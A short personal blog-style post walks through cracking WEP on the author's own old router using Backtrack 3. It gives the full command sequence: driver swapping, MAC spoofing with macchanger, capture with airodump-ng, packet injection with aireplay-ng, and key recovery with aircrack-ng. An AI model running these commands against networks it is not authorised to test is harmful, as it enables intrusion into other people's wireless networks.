Breaking WEP using Backtrack 3

I had a bet with a friend of mine (for a case of beer) that I could crack a fake WEP encrypted access point in under 5 minutes using my rather old Packard Bell Easynote Skype Edition.

There are a few things to note, I used an old WEP only router that I was about to dump. I never saw the password and couldn’t ask for hints. I also found out that my piece of shit laptop can’t be booted from a DVD, hence having to use Backtrack 3 instead of Backtrack 5.

After Backtrack 3 was downloaded, burnt to disk, booted up and a shell opened.

The drivers loaded automagically are the wrong ones. If you have the Easynote Skype edition, you’ll notice this as the WiFi light on the Wifi button fails to come on.

Unload the wireless drivers

modprobe -r iwl3945

Load in the correct drivers

modprobe ipwraw 

Stop the Wireless card

airmon-ng stop wifi0
ifconfig wifi0 down

Change the MAC address

macchanger --mac 00:11:22:33:44:55 wifi0 

Start up Airmon, to monitor the AP in the area

airmon-ng wifi0

After finding the access point, and noting it’s BSSID and Channel

airodump-ng -c CHANNEL_NUMBER -w FILE.OUT --bssid BSSID_HERE wifi0 

Open up a new terminal, leaving airodump to run in Terminal 1.

Inject some fake packets on Terminal 2

aireplay-ng -1 0 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0

Airodump’s #Data column should start filling up. When it gets to about 100, kill the injection.

In Terminal 2, we’ll replay the packets we faked earlier

aireplay-ng -3 -b BSSID_HERE -h 00:11:22:33:44:55 wifi0

You should now see the # Data shoot up! Leave it run until #Data reaches about 50k. Close Terminal 2 and kill airodump in Terminal 1.

aircrack-ng -b BSSID_HERE FILE.OUT.cap

After about 15 seconds, you should have the wireless password.